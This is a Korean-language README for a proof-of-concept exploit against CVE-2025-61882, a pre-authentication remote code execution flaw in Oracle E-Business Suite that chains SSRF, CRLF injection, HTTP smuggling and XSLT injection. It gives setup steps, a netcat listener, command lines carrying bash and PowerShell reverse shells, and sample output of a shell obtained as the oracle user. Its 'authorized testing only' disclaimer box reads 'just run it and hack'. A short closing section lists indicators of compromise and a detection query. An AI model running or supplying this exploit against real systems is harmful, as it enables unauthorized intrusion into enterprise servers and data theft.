
CVE-2025-61882를 위한 익스플로잇으로, Oracle E-Business Suite의 중요한 사전 인증 원격 코드 실행(RCE) 취약점입니다. SSRF, CRLF 인젝션, HTTP 스머글링, XSLT 인젝션을 결합하여 인증 없이 원격 코드 실행을 가능하게 합니다.
기술적 세부사항은 블로그 게시물을 참조하세요
이 도구는 승인된 보안 테스트 전용입니다
╔══════════════════════════════════════════════════════════════╗
║ ║
║ 🚨 컴퓨터 시스템에 대한 무단 접근은 불법입니다 🚨 ║
║ ║
║ 이 도구를 사용함으로써 귀하는 다음 사항을 인정하고 동의합니다: ║
║ ║
║ ║
║ 그냥 실행하고 해킹하세요 ║
║ ║
║ ║
║ ║
║ ║
║ ║
╚══════════════════════════════════════════════════════════════╝
CVE-2025-61882에 대한 보안 테스트 도구로, Oracle E-Business Suite에 영향을 미치는 중요한 사전 인증 원격 코드 실행 취약점입니다.
제작: Mindflare
CVE-2025-61882는 다섯 가지 개별 취약점을 결합한 정교한 익스플로잇 체인입니다:
/OA_HTML/configurator/UiServlet를 통한 서버 측 요청 위조return_url 매개변수의 HTTP 헤더 인젝션/OA_HTML/help/../ 접두사를 통한 인증 우회# 저장소 복제
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC
# 종속성 설치
pip3 install -r requirements.txt
# 스크립트 실행 가능하게 설정 (Linux/Mac)
chmod +x cve-2025-61882-detector.py
별도의 터미널에서 netcat 리스너를 시작하세요:
# Linux/Mac
nc -lvnp 4444
# Windows
nc.exe -lvnp 4444
기본 사용법 (Linux 대상):
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
--platform linux
Windows 대상:
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
--platform windows
[*] Target URL: http://192.168.1.22:8000
[*] Listener IP: 192.168.1.10
[*] Listener Port: 80
[*] Platform: linux
[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully
[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$
SELECT * FROM XDO_TEMPLATES_B
WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
네트워크 IOC:
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)
HTTP 패턴:
POST /OA_HTML/configurator/UiServletPOST /OA_HTML/SyncServletGET /OA_HTML/help/../*.jsp교육용 사용 제한이 있는 MIT 라이선스 - LICENSE 참조
면책 조항: 이 소프트웨어는 승인된 보안 테스트 전용입니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 저자는 오용에 대한 책임을 지지 않습니다.
제작: Mindflare | 최종 업데이트: 2025년 10월
| 매개변수 | 설명 | 필수 | 예시 |
|---|
--target | 대상 Oracle EBS URL | 예 | http://192.168.1.22:8000 |
--lhost | 사용자 IP 주소 (콜백용) | 예 | 192.168.1.10 |
--lport | HTTP 서버 포트 (XSL 페이로드 제공) | 예 | 80 또는 8080 |
--command | 대상에서 실행할 명령어 | 예 | 위 예시 참조 |
--platform | 대상 OS: linux 또는 windows | 예 | linux |